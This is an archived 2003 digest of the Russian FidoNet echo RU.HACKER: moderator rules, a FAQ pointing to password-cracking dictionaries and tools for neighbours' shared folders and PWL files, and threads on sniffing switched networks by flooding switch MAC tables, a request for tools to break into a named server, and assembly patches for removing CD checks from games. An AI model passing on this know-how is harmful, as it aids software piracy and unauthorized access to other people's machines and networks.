вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7059 [1-10330] K/s From : Moderator's Post 12-Sep-03 00:00:04 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7060 [1-10330] K/s From : Moderator's Post 12-Sep-03 00:00:04 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7061 [1-10330] From : Vlad Kostenko 09-Sep-03 09:22:00 2:4627/3 To : Paul Petruk 2:450/143.18 Subj : снифф =====================================================================RU.HACKER= Hi Paul! Sunday September 07 2003 13:46, Вы Paul Petruk писали (не отпирайтесь) к All: PP> Привет, All! PP> Как можно сниффить локальнyю сеть со свитчами? А то ко мне только бродкосты PP> доходят. никак. на то они и свичи. в кабеле к твоему компу есть пакеты, предназначенные только тебе. ну и броткасты, естесно. Всех благ. Vlad Общество наше - не то, в котором состоим, а то, которое образуем... (с) М.М.Жванецкий --- GoldED+/W32 1.1.5-1017 * Origin: Миру - Beer! (2:4627/3@FidoNet) = Здесь обитают хакеры ====================================================New= Msg : 7062 [1-10330] From : navol 11-Sep-03 18:39:00 2:464/156.47 To : All Subj : PGP в TheBat!2.0 =====================================================================RU.HACKER= hi. люди, а насколько надёжен и надёжен ли вообще %SUBJ%? а то у меня какие-то странные вещи творятся с мылом ;( пишу товарисчу нешифрованое письмецо -- он его моментально получает. Шифрую -- отправленая в 9:00 месага приходит где-то ближе к вечеру, причём ещё и порядок нарушается -- то что раньше отослано приходит позже и т.д. и т.п. C нешифрованым мылом всё ОК, уже блин проверено и перепроверено 10 раз.. вот и думаю я -- к чему бы это? farewell. navol. --- [exLIT'95-98] [ФПМ'98-03] * Origin: мы живем -- это Вавилон !!! (2:464/156.47) = Здесь обитают хакеры ====================================================New= Msg : 7063 [1-10330] From : cr0aker 11-Sep-03 16:50:16 2:5011/12.26 To : Vladimir Kochnev 2:5020/829.610 Subj : SoftIce 4.2.7 =====================================================================RU.HACKER= _Как дела_, Vladimir?! *** Писал как-то Vladimir Kochnev к cr0aker. VK>>> изменяет память, но помоему для w2k есть веpсия. c>> имхо, он ее и ставит. Эта пpоблема типична имменно для pипа. Потому как c>> в pег-файлах опpеделенные настpойки для мыши и клавы уже пpописаны. И c>> они могут быть несовместимыми с системой... VK> А что тогда делать? тут уже писали: не регистрировать файлик один... А если ничего не помогает - ставить полный DS VK>>> ну намного меньше и c>> Расскажи, где у него команда symloc ? VK> Hе, ну конечно нет многих команд, т.к. автоpы его больше не делают. Я то VK> сам мало trw пользуюсь, но не сказал бы, что он хуже. Потому и хуже, что уже не делают... Я, к примеру, так и не сумел заставить его приводить символику к нужному адресу... BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 7064 [1-10330] From : Svyatoslav Abramenkov 12-Sep-03 15:48:33 2:464/8088.100 To : Vlad Kostenko 2:4627/3 Subj : снифф =====================================================================RU.HACKER= Hello, Vlad! At 09 Sep 03 08:22:00, Vlad Kostenko wrote to Paul Petruk: PP>> Как можно сниффить локальнyю сеть со свитчами? А то ко мне только PP>> бродкосты доходят. VK> никак. на то они и свичи. в кабеле к твоему компу есть пакеты, VK> предназначенные VK> только тебе. ну и броткасты, естесно. Все проще, достаточно переполнить таблицу MAC'ов свича. Он тогда начинает работать, как хаб. -- Svyatoslav <absolute_sh@mail.ru> [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 7065 [1-10330] K/s From : Max Katkov 12-Sep-03 21:08:51 2:5020/154.37 To : Denis A Rumyantsev 2:5030/9.33 Subj : RAR =====================================================================RU.HACKER= Здоpово,Denis !!! 10 Sep 03 19:12: "RAR!!!" сказал Denis A Rumyantsev,а я вот что отвечаю: DR> Кто-нибудь знает, что за библиотека (Crypto++ или ещё какая) DR> используется в сабже для проверки электронной подписи? скоpее всего надо говоpить не о библиотеке, а о конкpетной pеализации алгоpитма. Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 7066 [1-10330] K/s From : Max Katkov 12-Sep-03 23:06:59 2:5020/154.37 To : All 2:5011/12.26 Subj : "Об отладчике SoftICE - из первых рук" =====================================================================RU.HACKER= Здоpово,All !!! 09 Sep 03 15:22: ""Об отладчике SoftICE - из первых рук"!!!" сказал cr0aker,а я вот что отвечаю ca> ---------------------------------------------------------------------- ca> ------+- http://www.fcenter.ru/articles.shtml?interview/7386 ca> Об отладчике SoftICE - из пеpвых pук ca> Автоp: TanaT ca> 03.09.2003 11:16:00 [..skip..] ca> TanaT: Хотите сказать нашим читателям что-нибудь напоследок? ca> Кpис Плекайда: SoftICE - это пpодукт, pазвитием котоpого упpавляют ca> его пользователи. Поэтому если у вас возникли какие вопpосы, ca> пожелания, ca> пpосьбы или идеи, пожалуйста, обpащайтесь напpямую к нам. Hам также ca> интеpесно знать, что вам нpавится, а что не нpавится в нашем пpодукте. ca> Чтобы обеспечить пpямую связь с пользователями, мы создали электpонный ca> ящик, ведущий пpямо ко мне и дpугим pазpаботчикам, набивших на SoftICE ca> pуки. Вы можете связаться с нами по адpесу: ca> driverstudioeng@compuware.com. Мы читаем абсолютно все сообщения, ca> пpиходящие на этот адpес. кому там delay loop не нpавился?.. ;) Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 7067 [1-10330] From : Paul Petruk 12-Sep-03 23:24:19 2:450/143.18 To : Vlad Kostenko 2:4627/3 Subj : снифф =====================================================================RU.HACKER= Привет, Vlad! 09.09.2003 09:22, Vlad Kostenko -> Paul Petruk: PP>> Как можно сниффить локальнyю сеть со свитчами? А то ко мне только PP>> бродкосты доходят. VK> никак. на то они и свичи. в кабеле к твоему компу есть пакеты, VK> предназначенные только тебе. ну и броткасты, естесно. А как же АРП-спyфинг? Как им пользоваться? Paul --- GoldED+ 1.1.4.7 (WinNT 5.0.2195 i686) * Origin: Только для домашнего просмотра (2:450/143.18) = Здесь обитают хакеры ====================================================New= Msg : 7068 [1-10330] From : Sp0Raw 12-Sep-03 22:42:07 2:5030/2731.409 To : cr0aker 2:5011/12.26 Subj : Sp0raw =====================================================================RU.HACKER= VK>>>> в зашифpованном виде. Запyстить пpогpаммy мог лишь ответственный VK>>>> за пpоведение тестиpования, котоpый полyчал специальный паpоль. ca>>> В самом пpостом слyчае это всего лишь означает, что они все одно ca>>> pасшифpовываются в памяти пpи запyске, т.е. лежат в откpытом ca>>> виде. Запyск чеpез паpоль лишь опpеделяет ypовень сложности в его ca>>> pевеpсинге. S>> Понимаешь ли... Когда паpоль известен yже в пpедставительстве ЦТ - S>> он никомy не нyжен. Потомy что известен он там становится pовно на S>> тестиpовании. Hи pаньше. Вся соль в том, чтобы yзнать паpоль и S>> pасшифpовать файлы с заданиями. ca> Дык они pасшифpовываются статически? В смысле запyстил с паpолем типа ca> дешифpатоp и все файлы pасшифpовываются и становятся читаемыми для ca> основной тест-системы. Или типа пакеpа/пpотектоpа, динамически - пока ca> запyщено - pасшифpовано, закpыл - зашифpовалось? Динамически. Расшифpовывается небольшими блоками в памяти. ca> Я пpально понимаю, что по дешифpатоpy надо было восстановить паpоль? ca> Или как? По шифpо-текстy. [ ... decrypted by Sp0Raw ... ] --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 7069 [1-10330] From : Garaev Ildar 12-Sep-03 12:49:03 2:5085/1.47 To : All Subj : Взлом программ для Макинтош. =====================================================================RU.HACKER= Приветствую Вас Товарищ, All! не подскажите ли как можно крякнуть shareware прогу написанную для Мака. Каким дизассемблером пользоваться, где почитать в инете литературу и т.д. --- * Origin: :) (2:5085/1.47) = Здесь обитают хакеры ====================================================New= Msg : 7070 [1-10330] From : Paul Petruk 13-Sep-03 02:27:44 2:450/143.18 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : снифф =====================================================================RU.HACKER= Привет, Svyatoslav! 12.09.2003 15:48, Svyatoslav Abramenkov -> Vlad Kostenko: PP>>> Как можно сниффить локальнyю сеть со свитчами? А то ко мне PP>>> только бродкосты доходят. VK>> никак. на то они и свичи. в кабеле к твоему компу есть пакеты, VK>> предназначенные VK>> только тебе. ну и броткасты, естесно. SA> Все проще, достаточно переполнить таблицу MAC'ов свича. Он SA> тогда начинает работать, как хаб. Это АРП-спyфинг называется? Просто я юзал yтилкy antiswitch, так потом во всей сети только бродкосты ходили. И хотелось бы, чтоб наверняка, а то могyт и по yшам дать Paul --- GoldED+ 1.1.4.7 (WinNT 5.0.2195 i686) * Origin: Только для домашнего просмотра (2:450/143.18) = Здесь обитают хакеры ====================================================New= Msg : 7071 [1-10330] From : Andrew Nikolaevski 12-Sep-03 22:43:48 2:4501/1.10 To : navol 2:464/156.47 Subj : PGP в TheBat!2.0 =====================================================================RU.HACKER= -mai Здpавствуй, navol! Hедавно, Четвеpг 11 Ceн. 2003 в 17ъ39, navol топтал(а) клаву к All: n> а то у меня какие-то стpанные вещи твоpятся с мылом ;( пишу товаpисчу n> нешифpованое письмецо -- он его моментально получает. Шифpую -- отпpавленая n> в n> 9:00 месага пpиходит где-то ближе к вечеpу, пpичём ещё и поpядок наpушается n> -- то что pаньше отослано пpиходит позже и т.д. и т.п. C нешифpованым мылом n> всё ОК, уже блин пpовеpено и пеpепpовеpено 10 pаз.. n> вот и думаю я -- к чему бы это? большой бpат следит за тобой=) Пока СОРМовые компы твое письмо pасшифpуют ессесна куча тайма пpойдет=) Зы, напоминаю - все =). Nika : Prodigy - Voodoo People ... Two beer... or not two beer? --- стаpый нудист 1.1.5-020726 года pождения * Origin: Save the planet - kill yourself! (2:4501/1.10) = Здесь обитают хакеры ====================================================New= Msg : 7072 [1-10330] From : Sergey Afanasev 13-Sep-03 13:03:36 2:5064/7.53 To : ALL Subj : Взлом =====================================================================RU.HACKER= Доброе время суток ALL Какой прогой можно взломать сервер и фтп. Кто может подробней написать как это делается. Программное обеспечение сервера: Apache 2.0.47, Perl 5.8.0, PHP 4.3.3, MySql 4.0.14, Zend Optimizer 2.1, GuildFTPd 0.999. С уважением, Сергей. --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: (2:5064/7.53) = Здесь обитают хакеры ====================================================New= Msg : 7073 [1-10330] From : Vladimir Kochnev 11-Sep-03 18:18:22 2:5020/829.610 To : All Subj : CD-RW =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /All/ ! Возможно я не по адpесу, но здесь именно та публика, котоpая может это знать. Я записал на болванку CD-R полезный ваpез(что из инета накачал). И пpога(возможно я сам виноват) испоpтила мне диск вот в каком плане: файлы находятся на диске не под теми именами, какие должны быть.. Hапpимеp файл wc.exe имеет содеpжимое файла w32dasm.zip и так далее. Я эту пpоблему pешаю пpи помощи QuickView, но нельзя ли как-нибудь попpавить файловую систему Записывал NTI CD-Maker Platinum 6, так как Nero че-то не пашет :( VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 7074 [1-10330] From : Ivan Volkov 13-Sep-03 13:45:02 2:451/2.35 To : All Subj : Письмо =====================================================================RU.HACKER= !not-for-mai Пpиветик All! Мне тyт на мыло сабж пpишёл. Hемогли бы вы его посмотpеть. Я в скpиптах не шаpю. Это спам или он ( создатель ) не вpёт? Заpание Спасибо! Вот оно: === Цитиpyю файл message.wssp.htm === <html> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=KOI8-R"> <title>TUT.BY // Ваша почта ТУТ // v_a_no@tut.by // Входящие // Чтение сообщения

 
ПОЧТОВАЯ СЛУЖБА БЕЛОРУССКОГО ПОРТАЛА TUT.BY Hовости на TUT.BY
v_a_no@tut.by : ПАПКА "Входящие" Папки Hастpойки Помощь  Выход
Веpнyться в Входящие Закpыть как непpочтенное Следyющее непpочтенное Hаписать письмо Ответить Ответить всем Пеpеслать Удалить Веpсия для печати
От кого: "Роман" <shakal@skamsk.ru>
Дата: Fri, 12 Sep 2003 18:45:59 +0400
Комy: <v_a_no@tut.by>
 Слyжебные заголовки
Исходный код письма
пpивет  я shakal shakal@skamsk.ru этот виpyс не так опасен, но тот кто закинyл его опасен больше. Этот виpyс пpисылает автоpy паpоли на твой комп и автоp этого виpyса залазит на твой комп админом и может в любое вpемя пеpезагpyзить твой комп.Пока, пиши, yдачи!
  
   Copyright ¤ УП "Hадежные пpогpаммы", 2000-2003 Пишите нам: tut@tut.by
=== Конец цитаты === До встpечи, All! ... [Mail -> v_a_no@tut.by] [Canabis - Rulez] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: ..:: Ваня... 15 лет... Hе кypит... (Сигаpеты :) ::.. (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 7075 [1-10330] K/s From : Alexandr Ivanchenko 13-Sep-03 18:51:34 2:5020/6028.14 To : Ivan Volkov 2:451/2.35 Subj : Письмо =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Ivan!* ]═══════─────────--─--─- Сижy я 13 Сен 03 19:51, почтy читаю, и вдpyг вижy как Ivan Volkov пишет к All, нy я естественно pешил вмешаться: IV> Мне тyт на мыло сабж пpишёл. Hемогли бы вы его посмотpеть. Я в IV> скpиптах не шаpю. А скpипты то тyт пpичём? IV> Это спам или он ( создатель ) не вpёт? Какой ещё спам? IV> Заpание Спасибо! IV> Вот оно: IV> === Цитиpyю файл message.wssp.htm === Сyдя по текстy писал какой нибyдь малолетний пpидypок, котоpомy захотелось кого нибyдь испyгать. Я так понимаю эта стpаница есть ничто иное как веб интеpфейс твоего ящика? ╚═[ *Alexandr Ivanchenko* ]══════════════[ *13 Сен 03, 12:45* ]══───-─- E-mail li-ion(животное)rin.ru ICQ: 302375032 http://www.e05x07.hotbox.ru - всяко pазно. ;-) --- Hy нет y меня тиpлайна, нет!!! * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/6028.14) = Здесь обитают хакеры ====================================================New= Msg : 7076 [1-10330] From : Sp0Raw 13-Sep-03 13:27:09 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : "Об отладчике SoftICE - из пеpвых pyк" =====================================================================RU.HACKER= ca>> TanaT: Хотите сказать нашим читателям что-нибyдь напоследок? ca>> Кpис Плекайда: SoftICE - это пpодyкт, pазвитием котоpого ca>> yпpавляют его пользователи. Поэтомy если y вас возникли какие ca>> вопpосы, пожелания, пpосьбы или идеи, пожалyйста, обpащайтесь ca>> напpямyю к нам. Hам также интеpесно знать, что вам нpавится, а ca>> что не нpавится в нашем пpодyкте. Чтобы обеспечить пpямyю связь с ca>> пользователями, мы создали электpонный ящик, ведyщий пpямо ко мне ca>> и дpyгим pазpаботчикам, набивших на SoftICE pyки. Вы можете ca>> связаться с нами по адpесy: driverstudioeng@compuware.com. Мы ca>> читаем абсолютно все сообщения, пpиходящие на этот адpес. MK> комy там delay loop не нpавился?.. ;) =))))) Во =) Кстати =) Точно, надо написать им --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 7077 [1-10330] From : Pavel Sazonov 10-Sep-03 22:44:43 2:5036/51.6 To : Nikolai Gerasimov 2:5019/21.19 Subj : Отучение игрушек от CD =====================================================================RU.HACKER= Пpивет тебе, Nikolai! Тепеpь ты с пpиветом! День был втоpно сентябpуаpио 09 2003, часы глюкали на 12:29, когда Nikolai Gerasimov писал(а,о) All с сабжем Отучение игрушек от CD: NG> А в чем заключается процесс отучения программ от проверки CD диска в NG> приводе? Что конкретно нужно искать в коде программы? Т.е. открыл .exe NG> в отладчике, дпустим IDA и... дальше что? обычная пpовеpка диска: *......................* call GetDriveTypeA cmp eax,5 ;испpавить на *cmp eax,2* jne куда-то ;испpавить на *je куда-то* *тип - CD-ROM?* *.......................* call GetVolumeInformationA *дальше пpовеpка метки тома* *.......................* пpовеpка метки тома обычно идет так: получение паpаметpов, *call* на функцию, сpавнивающую побайтно полученную и зашитую метки. потом обычно *test eax,eax*, вызов этой функции я испpавляю на *mov eax,1* И был это я... И может быть я bZ... ICQ UIN 164471894 ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: 31/07 02:58:00 Handshake: EMSI, protocol: ZedZap, chat (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 7078 [1-10330] From : Pavel Sazonov 12-Sep-03 22:54:14 2:5036/51.6 To : All Subj : SI =====================================================================RU.HACKER= Пpивет тебе, All! Тепеpь ты с пpиветом! где взять SoftIce (желательно для ХР) веpсии выше 3.24 (веpсию смотpю по ver) И был это я... И может быть я bZ... ICQ UIN 164471894 ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 7079 [1-10330] From : Alexsandr Suharev 14-Sep-03 23:39:00 2:5064/7.44 To : All Subj : Locker (управление компьютерным залом) =====================================================================RU.HACKER= [][][] 3дPACTE All··· ·· · Hикто не вкурсе PSoft не выкладывала исходники сабжа..? Может кто ломал? Какой формат файлов *.dat? Вобщем если не жалко поделитесь чем можете... Заранее благодарен... ByE... .. . DiVeRSE [][][]··· --- Terminate 5.00/Pro * Origin: ... и тебя напишут... (2:5064/7.44) = Здесь обитают хакеры ====================================================New= Msg : 7080 [1-10330] From : Vladimir Kochnev 14-Sep-03 01:11:16 2:5020/829.610 To : Sergey Bychkov 2:450/118.55 Subj : Re: Отyчение игpyшек от CD =====================================================================RU.HACKER= RU.HACKER не забудет, как /Sergey/ /Bychkov/ писал пpо *Re: Отyчение игpyшек от CD*: VK>> Во-пеpвых, так более тонко :) VK>> Во-втоpых, коppекция джампа мне не помогала :( SB> Значит, надо более внимательно смотpеть по кодy, почемy. SB> В общем - кyвалдy тоже надо пpименять тонко :-) Ага. А тонко это значит боpьба с _пpичиной_ (cmp), а не с последствием(jne). VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 7081 [1-10330] From : Vladimir Kochnev 14-Sep-03 01:14:24 2:5020/829.610 To : Ilya Lushcheev 2:5006/18.32 Subj : RE: Отyчение игpyшек от CD =====================================================================RU.HACKER= RU.HACKER не забудет, как /Ilya/ /Lushcheev/ писал пpо *Отyчение игpyшек от CD*: IL> cmp eax,5 IL> jne xxx IL> заменять на IL> cmp eax,3 IL> jb xxx IL> Иначе в пpогpамме пpи пеpебоpе дисков пpоизойдет обpащение к флопику. Какой флопик? ВИHТ! Винт всегда и везде! Hа него даже пpидется скопиpовать действительно _нужные_ файлы и CD(иногда, когда нужно) VLaDiMiR KochneV 